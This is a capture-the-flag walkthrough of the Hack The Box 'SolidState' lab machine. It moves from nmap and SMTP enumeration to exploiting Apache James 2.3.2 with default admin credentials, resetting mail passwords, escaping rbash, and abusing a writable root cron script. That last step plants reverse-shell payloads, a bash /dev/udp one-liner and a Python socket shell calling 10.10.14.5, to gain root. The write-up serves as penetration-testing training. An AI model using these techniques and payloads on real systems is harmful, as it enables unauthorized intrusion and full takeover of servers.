# ENUMERATION
## NMAP
The scan returned multiple interesting services
# nmap -p- -sV -sC -o solidstate.txt --script vuln 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:47 EDT
Nmap scan report for 10.10.10.51
Host is up (0.050s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.51:80/
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/index.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/services.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/about.html
| Form id: name
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /README.txt: Interesting, a readme.
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|_http-server-header: Apache/2.4.25 (Debian)
| http-sql-injection:
| Possible sqli for queries:
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|_ http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp open pop3 JAMES pop3d 2.3.2
|_sslv2-drown:
119/tcp open nntp JAMES nntpd (posting ok)
|_sslv2-drown:
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
## Port 25 SMTP
We have an smtp services running. This {[VRFY EXPN RCPT - pentest monkey](https://www.ndchost.com/wiki/mail/test-smtp-auth-telnet)} explains how we could connect and test smtp service on port 25.
# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 06:22:00 -0400 (EDT)
VRFY
502 5.3.3 VRFY is not supported
EXPN
502 5.3.3 EXPN is not supported
RCPT
503 5.5.0 Need MAIL before RCPT
Since the service does not support the first two protocols we're going to use RCPT.
$ /usr/share/legion/scripts/smtp-user-enum.pl -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Apr 15 06:23:54 2021 #########
######## Scan completed at Thu Apr 15 06:24:02 2021 #########
0 results.
168 queries in 8 seconds (21.0 queries / sec)
I have also tried enumerating for email addresses by adding "-D 10.10.10.51" and "-D solid-state-security.com" but again with no success.
## Port 80 HTTP
The nmap scan reveals a web service running. Let's try to find hidden directories/files. The scan already reported some possibly interesting directories, however, upon checking them - did not find anything important.
#### Dirbuster
![[solidstate dirbuster.PNG]]
#### sqlmap
I have tested the js false-positive just for the sake of it, and proved that it is not injectible.
## Port 4555 tcp admin-James
#### Searchsploit
We can't but notice that the exploits are for the same version as the one running on the machine.
# searchsploit JAMES
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow | windows/remote/944.c
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The following picture is from the RCE python exploit. It seems the default credentials are root:root. Let's test it:
# Exploitation
![[Pasted image 20210415135840.png]]
$ python 35513.py 10.10.10.51 1 ⨯
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
Now, in order to execute the payload we need to find a way to login to the machine. There is an smtp service running and we know the default credentials root:root :```bash
$ telnet 10.10.10.51 4555 130 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mailadmin mailadmin
Password for mailadmin reset
exit
Unknown command exit
quit
Bye
Connection closed by foreign host.
Cool, I have logged onto the service by using default credentials, we understood what users exist, and we were able to change passwords. Now I am going to access the account for mailadmin since It looks the most juicy account.
1. Credentials mailadmin:mailadmin
![[Pasted image 20210415214145.png]]
2. It will prompt you to a window that says that it uses plain text and not encrypted. Confirm and continue.
3. Ok, apparently the mailadmin account was a waste of time, lol :D. Let's repeat the process for the rest of the accounts ( click set up another account) and hope we get something out of it.
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mindy mindy
Password for mindy reset
4. Mindy's account has a welcoming and an access emails which contains a password.
![[Pasted image 20210415214939.png]]
Ok, so upon logging in through ssh with the following credentials: mindy:P@55W0rd1!2@ , the python exploit runs and a bash_completion file is created. However, we're put in a rbash shell.
$ ssh [email protected]
Received: from 10.10.14.5([10.10.14.5])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 902
for <../../../../../../../../etc/bash_completion.d@localhost>;
Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
Date: Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
From: [email protected]
$ whoami
-rbash: whoami: command not found
I have managed finally to escape the restrictive shell by adding "-t bash".
$ man ssh
</deleted>
-t Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services. Multiple -t options force tty alloca‐
tion, even if ssh has no local tty.
</deleted>
ssh [email protected] -t bash
[email protected]'s password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
bin user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
# Privilege escalation
#### Enumeration
$ bash linenum.sh > output.txt
I did not manage to find anything interesting apart from some system ports that are open. Next script I'd like to try is probably unix-priv-check from [pentestmonkey](http://pentestmonkey.net/tools/audit/unix-privesc-check) however, the box did not have strings which is a requirement for it to run.
#### writeable files/directories
$ find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
NICE! We have a root-owned file which we could modify and execute. Let's escalate. Firstly, I have tried to get a reverse shell
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ls
newfile.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cd opt
bash: cd: opt: No such file or directory
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cd /opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ nano tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ date
Thu Apr 15 16:04:56 EDT 2021
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('bash -c "sh -i >& /dev/udp/10.10.14.5/1234 0>&1"')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ date
Thu Apr 15 16:05:13 EDT 2021
I have proven myself that cron executes the file every minute by writing into the tmp.py:
!/usr/bin/env python
import os
import sys
try:
os.system('touch /tmp/shell.py;python shell.py')
except:
sys.exit()
After a while, a file was created in /tmp/.
I have edited the file with the python script from the [reverse shell sentrywhale](https://sentrywhale.com/documentation/reverse-shell) website:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.5",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Catch the shell.
$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 39694
bash: cannot set terminal process group (3597): Inappropriate ioctl for device
bash: no job control in this shell
root@solidstate:~# ls
ls
file.py
root.txt
0 Comments
Recommended Comments
Няма коментари